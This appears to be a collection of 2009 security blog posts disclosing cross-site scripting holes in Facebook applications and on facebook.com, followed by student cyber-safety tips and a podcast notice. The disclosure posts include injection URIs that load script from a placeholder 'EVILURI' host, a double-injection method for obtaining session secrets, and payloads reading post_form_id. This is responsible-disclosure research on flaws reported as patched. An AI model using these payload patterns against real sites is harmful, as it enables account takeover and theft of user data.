FAXX Hack: FarmVille

Current Monthly Active Users: 33,439,207

Current Rank on Application Leaderboard: 1

Application Developer: Zynga

Responsiveness: After notifying Zynga, I received a reply almost immediately from their Senior Director of Security.  The company moved swiftly to patch the hole, and they’ve been both very responsive and very gracious in their communications.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/onthefarm/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2Findex.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E

Notes: Several of the recent holes I’ve found are similar to this one.  Rather than relaying a particular property from the URI within the FBML/HTML of the page, the application included a complete copy of the URI at some point.  This often happens when an application includes a tracker or perhaps needs a form that submits back to the current page.  But if the URI is not escaped prior to being included in such a context, one can add code to the end of the URI that closes a given tag and allows new tags to be inserted.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hacks: Previous Vulnerabilities

Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.

FAXX Hack: FunSpace

Facebook Verified Application

Current Monthly Active Users: 8,527,725

Current Rank on Application Leaderboard: 20

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC

FAXX Hack: SuperPoke!

Facebook Verified Application

Current Monthly Active Users: 2,097,148

Current Rank on Application Leaderboard: 71

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E

FAXX Hack: SocialToo

Current Monthly Active Users: 1,835

Application Developer: Stay N’ Alive Productions, LLC

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\”><fb:iframe src=’http://EVILURI/’>

Notes: This application generally has extended permissions, such as status_update.

FAXX Hack: YellowPages.ca

Reported By: Uber0n at XSSed.com on March 22, 2009

Current Monthly Active Users: 1,198

Application Developer: Yellow Pages Group Co.

Vulnerability Status: Unpatched Patched as of Sep. 2, 2009

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada

Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Revealing Facebook Application XSS Holes

Beginning tomorrow, September 1st, I will begin posting full technical details of cross-site scripting vulnerabilities that I have discovered in Facebook applications. Following the model of the Month of Twitter Bugs, I will notify each application developer 24 hours prior to revealing any holes. After 24 hours have passed, I will publish a new post on theharmonyguy.com with the title “FAXX Hack:” (for Facebook Application XSS/XSRF) and the name of the application. I will also publish a corresponding update to my Twitter account with the hashtag #FAXX and a link to the post.

At this time, I have found five widely used Facebook applications vulnerable to XSS. I intend to look for more over the next few days, and I am open to submissions from others via theharmonyguy on Gmail. I will give full credit for any new holes submitted.

Once I have posted all known XSS vulnerabilities in Facebook applications, I plan on releasing the full source code of XSS/CSRF demos I have created which demonstrate the ways a hacker can exploit such problems.

Let the games begin.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Facebook XSS Details

Earlier this week, I reported finding a cross-site scripting vulnerability on a facebook.com page. Last night, I asked a friend with contacts at Facebook to let their developers know directly, and the company responded quickly. I confirmed just after midnight that the hole is now patched, which means I will now share technical details.

The problem was a fairly typical XSS issue. In poking around various pages related to application permissions, I noticed that several URI parameters appeared in the source of the page, but Facebook did a good job of filtering out characters which could allow cross-site scripting. Further experimentation revealed that specifying various parameters on one page led to various error messages.

This specific page was www.facebook.com/connect/prompt_permissions.php, a pop-up that can appear when an application requests extended permissions, such as read access to a user’s stream. A typical use of this page came by issuing a GET request with several parameters: api_key (the API key of the requesting application), v=1.0, extern=1, next (the next URI to load), channel_url (the cross-domain receiver file for communicating with Facebook), dialog_id, locale (language), and ext_perm (the specific extended permission requested).

For instance, if an application with API key d41d8cd98f00b204e9800998ecf8427e wanted to access a user’s stream, it may issue a GET request to this URI:

http://www.facebook.com/connect/prompt_permissions.php?↵
api_key=d41d8cd98f00b204e9800998ecf8427e&v=1.0&extern=1↵
&next=http://uri/&channel_url=http://uri/xd.php&↵
dialog_id=0_0.37541312664788107&↵
ext_perm=read_stream&locale=en_US

Note that the extended permission parameter is simply the text read_stream. When I tried setting it to a number, say ext_perm=1, I received a page with this error message:

The application cannot ask you for permission 1

Sure enough, this error message was not filtered.  I could then easily craft an XSS link. The trick only had two requirements: the user had to be logged into Facebook, and the API key had to match an application that the user had authorized. Since finding the API key of any third-party application is fairly trivial, one could easily target widely installed applications in an actual attack.

To demonstrate the possibilities of an XSS link, I set ext_perm=%3Cscript%3Ealert(document.getElementById(↵
%22post_form_id%22).value);%3C/script%3E
and saw this output:

Illustration of XSS vulnerability on facebook.com.

Illustration of XSS vulnerability on facebook.com

Those experienced with Facebook code will recognize what can be accomplished with post_form_id. Facebook uses this code to sign AJAX requests for all sorts of operations when someone uses pages on facebook.com, hence the list of activities I gave in my last post.

Of course, to perform such activities, an attacker would need the user’s Facebook ID, which does not occur in the source code of prompt_permissions.php. But since we’re injecting code into a facebook.com page, browser security no longer prevents script access to iframes or XHR objects that reference other facebook.com pages, since none of them happen cross-domain. In fact, by setting ext_perm=%3Ciframe+src%3D%22http%3A%2F2Fwww.facebook.com↵
%2Fprofile.php%22+id%3D%22x%22+onload%3D%22alert(↵
frames%5B'x'%5D.document.getElementById('profile_pic').src)↵
%3B%22%3E%3C%2Fiframe%3E
, one would see their profile image URI, which contains their Facebook ID.

Anyone familiar with JavaScript DOM manipulation can already see how much would be possible with such an XSS vulnerability. A malicious link could provide a hacker with nearly every bit of information or capability that a user can access when logged into Facebook. An attacker could also craft a sophisticated phishing scheme, since the page would be coming from facebook.com.

Facebook did act swiftly to correct this problem, as they’ve done with previous cases, and I commend them for their response. However, I would once again note that many Facebook applications, including widely used ones, have this same type of vulnerability.  An application cannot be exploited to the same degree as a facebook.com page, but it does allow a hacker to access profile information, send notifications, and publish stories on a user’s wall.  Facebook’s recently announced privacy changes should eventually help limit profile access via hijacked applications, but many security issues still remain.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Social Zombies: Your Friends Want To Eat Your Brains Video from DEFCON Posted

The video from the talk Kevin Johnson and I did at DEFCON 17 called “Social Zombies: Your Friends Want To Eat Your Brains” is now up on Vimeo.  If you missed us at DEFCON Kevin and I will be presenting an updated version at OWASP AppSec DC in November.

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


Facebook Hacked (Updated)

This morning I discovered a cross-site scripting vulnerability on a facebook.com page. The hole allows a hacker to execute scripts within the page and harvest a user’s post_form_id. That means an attacker could access the user’s profile and feed information, edit their profile information, change their status, send messages to their friends, post on their friends’ walls, authorize applications, authorize extended permissions for applications, and otherwise wreak havoc.

I have reported this problem to Facebook and expect them to respond quickly. Obviously, I intend to withhold details of the hack until Facebook issues a patch.

I would also note that while you might find this story of great interest, I personally think it pales in comparison to ongoing problems with the Facebook Platform. While this type of vulnerability is serious, Facebook normally acts swiftly in removing such a hole due to the readily apparent threat. Yet if nearly any Facebook application contains a similar hole, that allows a hacker to execute scripts, access profile information, issue notifications, post feed stories, and otherwise wreak havoc.

In the last few months, I have uncovered such holes in seven applications, three of which currently have monthly active users numbering in the tens of millions. Of course, an attacker can often reach users who have not already authorized an application using a trick known as clickjacking. I have written at length on how these attacks work, and have even demonstrated them several times.

Such hacks are not simply problems with Facebook applications – the current structure of the Facebook Platform itself enables the attacks. I am quite pleased that Facebook is today announcing new privacy controls which address at least one of the problems I outlined. I can only hope they continue to address remaining issues, and that malicious hackers do not launch any serious exploits in the mean time.

Update (8/29): Patched. Details later.

Update 2 (8/29): Technical details now available.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Back to school is a good time to review Cyber Safety guidelines for students

With children and young adults going back to school shortly, many parents are going to be concerned about their  child’s vulnerability to risks of using the Internet to keep in touch with school friends and people back home.

If you have a student at home who’s about to be using the Internet a lot more when they go back to school, please tell them to be careful, and, if possible, show them this list:

  1. Make sure you understand the Acceptable Computer and Network Usage Policies of the institution. If you violate them, you may lose Internet access, which for some students can mean failing the term.
  2. Make sure you have a software firewall and up to date, reputable anti-virus software on all computers that are connecting to the Internet. Anti-virus suites with anti-phishing and anti-spyware can also reduce the risks.
  3. Don’t accept social networking invitations (Twitter, Facebook, etc.) from people you don’t know. The number of imposters and scammers is growing – almost faster than these sites can shut them down.
  4. Don’t click on links or accept new Facebook applications if you don’t need to. There’s a growing list of dangerous applications and sites that may be more dangerous than they appear.
  5. Don’t post “Too Much Information” about yourself. You don’t know who might be watching or waiting for you to announce something that gives them a cue that they can act on against you. Don’t tell the world where you’re going and when, just because you can.
  6. Use different, strong passwords for Internet accounts, and consider using a free password manager program that uses a single password to protect passwords for all your accounts.
  7. Report illegal or suspicious computer activity to the institution or Internet Service provider immediately to protect yourself and your friends from becoming victims of hackers.
  8. Back up your assignments and work in multiple places as often as you can, and keep them safe from being stolen.
  9. Consider using a full-disk encryption program on your laptop if it has confidential information on it that you wouldn’t want to be printed in the newspapers.
  10. Don’t plug other peoples’ USB Flash drives into your computer. They can be infected with viruses that your computer’s anti-virus software may not catch. Always try to use your own USB drive, don’t plug it into a computer that doesn’t have any anti-virus software on it, and keep as little important data on it as you need to.

Ken Knapton has also published a book on Cyber Safety for families with kids. While I haven’t read it yet, I have been following Ken’s updates on Twitter with tips from the book, and I try to “retweet” them all. Although many of the tips are for parents trying to keep their families safe, I suspect there are some good tips for college students, too. The book is getting good reviews on his Facebook page.

There will always be risks on the Internet that our children will have to learn about sooner or later. But let’s hope they don’t have to learn the worst lessons from experience.

The sooner they learn how to use the Internet responsibly, the more comfortable they will be in a work environment where they can contribute to a culture of information security.

I am now offering monthly briefings, tailored to organizations that want to build and sustain security awareness for staff. Just because your security team is too busy to do its own training and awareness doesn’t mean you can’t have an economical way to address human security risks. Please call or email me at the coordinates below…

Scott Wright

The Streetwise Security Coach

Join the Streetwise Security Zone at:
http://www.streetwise-security-zone.com/join.html

Phone: 1-613-693-0997
Email: scott@streetwise-security-zone.com
Twitter ID: http://www.twitter.com/streetsec

To receive weekly security tips and other notices about helpful content available on this site, please make sure you are on my list by clicking HERE, and entering your name and email address.

 

 

Site Meter

Social Media Security Podcast 1 – Zombies, Bad Facebook Apps, Twitter SPAM

skullThis is the first episode of the Social Media Security Podcast.  This episode was hosted by Scott Wright and Tom Eston.  Below are the show notes, links to articles and news mentioned in the podcast:

Please send any show feedback to feedback[aT]socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  Thanks for listening!

**You can subscribe to the podcast now in iTunes!

1 21 22 23 24 25 35